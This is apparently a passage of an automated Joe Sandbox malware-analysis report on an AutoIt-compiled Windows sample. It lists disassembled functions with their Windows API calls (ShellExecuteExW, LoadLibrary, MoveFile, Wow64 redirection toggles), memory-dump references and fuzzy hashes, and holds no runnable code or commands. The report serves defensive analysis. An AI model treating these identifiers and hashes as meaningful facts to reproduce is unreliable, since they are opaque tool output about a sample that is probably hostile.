                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                • String ID:
                • API String ID: 839392675-0
                • Opcode ID: 443e1bdf59117ef82cb0355ab71d6b99cdc65b1e269300fe3843b725185d0c23
                • Instruction ID: c3e34cd7768ebd92e546e67467334c32fb1e35e87afdc8a80336564aba1bfb96
                • Opcode Fuzzy Hash: 443e1bdf59117ef82cb0355ab71d6b99cdc65b1e269300fe3843b725185d0c23
                • Instruction Fuzzy Hash: 05F05E72240158BBE7219B629C0EEEF3E7CEFCBB11F004159F605D1591EBA05A41CAF5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00167439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON
                Download Yara Rule
                APIs
                • GetClientRect.USER32(?), ref: 00167452
                • SendMessageW.USER32(?,00001328,00000000,?), ref: 00167469
                • GetWindowDC.USER32(?), ref: 00167475
                • GetPixel.GDI32(00000000,?,?), ref: 00167484
                • ReleaseDC.USER32(?,00000000), ref: 00167496
                • GetSysColor.USER32(00000005), ref: 001674B0
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ClientColorMessagePixelRectReleaseSendWindow
                • String ID:
                • API String ID: 272304278-0
                • Opcode ID: 4cbfcb1fc273c867c19485bf48b9bb26a81e76a63756911961b77674390bf924
                • Instruction ID: 7de0dc9614101939074107e66a1d48b41d55f05a1f4daab36e702da7d819ddb8
                • Opcode Fuzzy Hash: 4cbfcb1fc273c867c19485bf48b9bb26a81e76a63756911961b77674390bf924
                • Instruction Fuzzy Hash: 20014B31500215EFDB519FA4DD08BEEBBB6FB05321F550164F919A25A1CF311E91AB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00171874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                Download Yara Rule
                APIs
                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0017187F
                • UnloadUserProfile.USERENV(?,?), ref: 0017188B
                • CloseHandle.KERNEL32(?), ref: 00171894
                • CloseHandle.KERNEL32(?), ref: 0017189C
                • GetProcessHeap.KERNEL32(00000000,?), ref: 001718A5
                • HeapFree.KERNEL32(00000000), ref: 001718AC
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                • String ID:
                • API String ID: 146765662-0
                • Opcode ID: a2d56a6d5bb025462003362052c59db3a239f5ca7d8e48ffbe44ebe80b5c841d
                • Instruction ID: c53716c962698366f64d0a2bb616f4b536dba1c36b47ade87f176c2d493f4459
                • Opcode Fuzzy Hash: a2d56a6d5bb025462003362052c59db3a239f5ca7d8e48ffbe44ebe80b5c841d
                • Instruction Fuzzy Hash: 45E07576204505FBDB015FA5ED0C94ABF79FF4AB22B508625F22581871DB3294A1DF90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0017C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00117620: _wcslen.LIBCMT ref: 00117625
                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0017C6EE
                • _wcslen.LIBCMT ref: 0017C735
                • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0017C79C
                • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0017C7CA
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ItemMenu$Info_wcslen$Default
                • String ID: 0
                • API String ID: 1227352736-4108050209
                • Opcode ID: 9b36d0f61ed3255403e10a56edccb3cd676afe6c2e69cbab3dd428cc7d8ff297
                • Instruction ID: 1070b78ace65f88988b536de3c9cb5edd5809bbe8ae0e4742d2389ab83f14f92
                • Opcode Fuzzy Hash: 9b36d0f61ed3255403e10a56edccb3cd676afe6c2e69cbab3dd428cc7d8ff297
                • Instruction Fuzzy Hash: D751E0716043419BD7189F28C885BAF77F8AF99314F048A2DF999E3290DB70D944CB92
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0019AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                Download Yara Rule
                APIs
                • ShellExecuteExW.SHELL32(0000003C), ref: 0019AEA3
                  • Part of subcall function 00117620: _wcslen.LIBCMT ref: 00117625
                • GetProcessId.KERNEL32(00000000), ref: 0019AF38
                • CloseHandle.KERNEL32(00000000), ref: 0019AF67
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CloseExecuteHandleProcessShell_wcslen
                • String ID: <$@
                • API String ID: 146682121-1426351568
                • Opcode ID: f3420370281f71c74e898ee2b665a0132b6318b3392ba5c4e39faa0f3ec85760
                • Instruction ID: 4e36e5fdaa8707bb64070ae9e5eb06aac5ce8799bf1dccef87ecc53bbaade7f3
                • Opcode Fuzzy Hash: f3420370281f71c74e898ee2b665a0132b6318b3392ba5c4e39faa0f3ec85760
                • Instruction Fuzzy Hash: D5715570A00219DFCF18DF64D494A9EBBF1BF08314F4484A9E816AB792CB74ED85CB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0017719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                Download Yara Rule
                APIs
                • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00177206
                • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0017723C
                • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0017724D
                • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 001772CF
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ErrorMode$AddressCreateInstanceProc
                • String ID: DllGetClassObject
                • API String ID: 753597075-1075368562
                • Opcode ID: 027e784bad4b72cd3f37d7259198eb5b222be64a09ba879177c7ba29572b996e
                • Instruction ID: 208078b2e4ad228b5d3c40f7b7ec343983db9b014c11b71fe77a0b6fe8935b7f
                • Opcode Fuzzy Hash: 027e784bad4b72cd3f37d7259198eb5b222be64a09ba879177c7ba29572b996e
                • Instruction Fuzzy Hash: 6E416D71A04204EFDB15CF94C884A9A7BB9EF45310F15C0ADBD19DF28AD7B1DA45CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001A3D7C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON
                Download Yara Rule
                APIs
                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001A3E35
                • IsMenu.USER32(?), ref: 001A3E4A
                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 001A3E92
                • DrawMenuBar.USER32 ref: 001A3EA5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Menu$Item$DrawInfoInsert
                • String ID: 0
                • API String ID: 3076010158-4108050209
                • Opcode ID: f3b3986fc1482eaeb77f19f99705dbb0c9135949acbcc6d6c71a7803e71b1aab
                • Instruction ID: 9210dcd4432f20451e6294e8f8443809c32fa477d272e9c932be06d0197fb78a
                • Opcode Fuzzy Hash: f3b3986fc1482eaeb77f19f99705dbb0c9135949acbcc6d6c71a7803e71b1aab
                • Instruction Fuzzy Hash: B6413B79A01209EFDB10DF50D884EEABBB5FF4A355F04412AF915AB250D730AE45CF90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00171DE2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00119CB3: _wcslen.LIBCMT ref: 00119CBD
                  • Part of subcall function 00173CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00173CCA
                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00171E66
                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00171E79
                • SendMessageW.USER32(?,00000189,?,00000000), ref: 00171EA9
                  • Part of subcall function 00116B57: _wcslen.LIBCMT ref: 00116B6A
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: MessageSend$_wcslen$ClassName
                • String ID: ComboBox$ListBox
                • API String ID: 2081771294-1403004172
                • Opcode ID: de3750bfefb00cc7d70404ff92f944504ed95f8b976d04420a43bee3fbad3c5d
                • Instruction ID: e51fedaea1c5ee368080285af8d6f52ae4d7e36ad1cfeb9bda8bae35878324b9
                • Opcode Fuzzy Hash: de3750bfefb00cc7d70404ff92f944504ed95f8b976d04420a43bee3fbad3c5d
                • Instruction Fuzzy Hash: 29217D71A00104BFDB199B68DC46CFFB7B9DF52350F108129F869A72E0DF344E469660
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001A2F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 001A2F8D
                • LoadLibraryW.KERNEL32(?), ref: 001A2F94
                • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 001A2FA9
                • DestroyWindow.USER32(?), ref: 001A2FB1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: MessageSend$DestroyLibraryLoadWindow
                • String ID: SysAnimate32
                • API String ID: 3529120543-1011021900
                • Opcode ID: f1279b4d41a5647d4c5b7962bea58cf52813e6ff831fae4b9e6dd19fe0bc525b
                • Instruction ID: 7afc26ba616c2c042091c49c1687e5497d2653a33db8e431177f6df2e7c4b936
                • Opcode Fuzzy Hash: f1279b4d41a5647d4c5b7962bea58cf52813e6ff831fae4b9e6dd19fe0bc525b
                • Instruction Fuzzy Hash: 03219D75204209AFEB108FA8DC80FBB77BDEB5A364F104629F950D7190D771DC9197A0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00134D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00134D1E,001428E9,?,00134CBE,001428E9,001D88B8,0000000C,00134E15,001428E9,00000002), ref: 00134D8D
                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00134DA0
                • FreeLibrary.KERNEL32(00000000,?,?,?,00134D1E,001428E9,?,00134CBE,001428E9,001D88B8,0000000C,00134E15,001428E9,00000002,00000000), ref: 00134DC3
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: AddressFreeHandleLibraryModuleProc
                • String ID: CorExitProcess$mscoree.dll
                • API String ID: 4061214504-1276376045
                • Opcode ID: 4c151747727c8d0700f09768eff38435a7df5a101688427f7eb41ff4ccebd2c4
                • Instruction ID: 5169bb528f494611cec6277fb7fd43f06b0ba1a2007092816823617cbc3d78fa
                • Opcode Fuzzy Hash: 4c151747727c8d0700f09768eff38435a7df5a101688427f7eb41ff4ccebd2c4
                • Instruction Fuzzy Hash: 26F03C35A40208ABDB119B94DC49BEEBFE5EF58751F0001A8F806A2660CB70AA80CAD0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0016D3A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                Download Yara Rule
                APIs
                • LoadLibraryA.KERNEL32 ref: 0016D3AD
                • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0016D3BF
                • FreeLibrary.KERNEL32(00000000), ref: 0016D3E5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Library$AddressFreeLoadProc
                • String ID: GetSystemWow64DirectoryW$X64
                • API String ID: 145871493-2590602151
                • Opcode ID: a2d56c9a3d889a7e225b576355e5b3c79f115c93d0a44fe43c6565e903ab15b0
                • Instruction ID: b53eca15dfdeabbaf08bd1b2582939b625a2d1927e3499a380bb04fc1e6a3523
                • Opcode Fuzzy Hash: a2d56c9a3d889a7e225b576355e5b3c79f115c93d0a44fe43c6565e903ab15b0
                • Instruction Fuzzy Hash: 5AF055B1F05A21DBD7751722AC289AD7720BF02B01F56809DF802F6210DB60CDA086C2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00114E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                Download Yara Rule
                APIs
                • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00114EDD,?,001E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00114E9C
                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00114EAE
                • FreeLibrary.KERNEL32(00000000,?,?,00114EDD,?,001E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00114EC0
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Library$AddressFreeLoadProc
                • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                • API String ID: 145871493-3689287502
                • Opcode ID: dc12808c9dbea617572c4192bc3d6c2b2fbb51e9e548cf56531c707ee477a719
                • Instruction ID: cb5daae160769d23131af17cf43b7f6b44f530ce2a7b13a796550195333f495e
                • Opcode Fuzzy Hash: dc12808c9dbea617572c4192bc3d6c2b2fbb51e9e548cf56531c707ee477a719
                • Instruction Fuzzy Hash: 1EE0CD35B035229BD23517257C18BDF6594AF83F62B050125FC04D2200DB64CD8148F5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00114E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                Download Yara Rule
                APIs
                • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00153CDE,?,001E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00114E62
                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00114E74
                • FreeLibrary.KERNEL32(00000000,?,?,00153CDE,?,001E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00114E87
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Library$AddressFreeLoadProc
                • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                • API String ID: 145871493-1355242751
                • Opcode ID: 1ecc454328c9c4cedf1d860ed00baac2e2422dc35a72ef71fe52c83a3c35536f
                • Instruction ID: f2fe222de1193058b025c70a5c4e84a099d9fd26523618bedd9ea0c298ddd951
                • Opcode Fuzzy Hash: 1ecc454328c9c4cedf1d860ed00baac2e2422dc35a72ef71fe52c83a3c35536f
                • Instruction Fuzzy Hash: BED0123560362297A6261B257C18DCB6A58AF87F513050625F905E2114CF65CD8285E0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0019A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                Download Yara Rule
                APIs
                • GetCurrentProcessId.KERNEL32 ref: 0019A427
                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0019A435
                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0019A468
                • CloseHandle.KERNEL32(?), ref: 0019A63D
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Process$CloseCountersCurrentHandleOpen
                • String ID:
                • API String ID: 3488606520-0
                • Opcode ID: 3ececab733c86eb793df38bdd7d66a7a98715ca1d2b04aceef1926837bd9f6e2
                • Instruction ID: 329f021a98a9c3e7fbaa3ceb243bb08fd1adef4eddf1deef818793e50c617590
                • Opcode Fuzzy Hash: 3ececab733c86eb793df38bdd7d66a7a98715ca1d2b04aceef1926837bd9f6e2
                • Instruction Fuzzy Hash: 2CA1B1716043019FDB24DF28D886F2AB7E1AF98714F54881CF95A9B2D2DB70EC45CB92
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0014BB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,001B3700), ref: 0014BB91
                • WideCharToMultiByte.KERNEL32(00000000,00000000,001E121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0014BC09
                • WideCharToMultiByte.KERNEL32(00000000,00000000,001E1270,000000FF,?,0000003F,00000000,?), ref: 0014BC36
                • _free.LIBCMT ref: 0014BB7F
                  • Part of subcall function 001429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0014D7D1,00000000,00000000,00000000,00000000,?,0014D7F8,00000000,00000007,00000000,?,0014DBF5,00000000), ref: 001429DE
                  • Part of subcall function 001429C8: GetLastError.KERNEL32(00000000,?,0014D7D1,00000000,00000000,00000000,00000000,?,0014D7F8,00000000,00000007,00000000,?,0014DBF5,00000000,00000000), ref: 001429F0
                • _free.LIBCMT ref: 0014BD4B
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                • String ID:
                • API String ID: 1286116820-0
                • Opcode ID: de74933dad15567ffa918e3b5e682db7efb1abd79dc9ba26f2d49e06dc1ff710
                • Instruction ID: b42a06f82ae7898a0332f8f6ad865a3f49937ff7572e2e7ccf165285f861a0ef
                • Opcode Fuzzy Hash: de74933dad15567ffa918e3b5e682db7efb1abd79dc9ba26f2d49e06dc1ff710
                • Instruction Fuzzy Hash: 4F51B57190821AEFCB14EFA5DCC19AEB7B8EF55310B20466AE554D71B1EB30DE818B90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0017E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 0017DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0017CF22,?), ref: 0017DDFD
                  • Part of subcall function 0017DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0017CF22,?), ref: 0017DE16
                  • Part of subcall function 0017E199: GetFileAttributesW.KERNEL32(?,0017CF95), ref: 0017E19A
                • lstrcmpiW.KERNEL32(?,?), ref: 0017E473
                • MoveFileW.KERNEL32(?,?), ref: 0017E4AC
                • _wcslen.LIBCMT ref: 0017E5EB
                • _wcslen.LIBCMT ref: 0017E603
                • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0017E650
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                • String ID:
                • API String ID: 3183298772-0
                • Opcode ID: e7c7af93001393851700d0735fad5c5c1272af60b8c2d348858cd2d76b177d0b
                • Instruction ID: 4a3bc3065be3ec81708230e4f512721723e43c094e4f507704859013181d98fa
                • Opcode Fuzzy Hash: e7c7af93001393851700d0735fad5c5c1272af60b8c2d348858cd2d76b177d0b
                • Instruction Fuzzy Hash: 8F5185B24083459BC724DB94DC919DF73ECAF99340F00496EF689D3191EF74A688C766
                Uniqueness

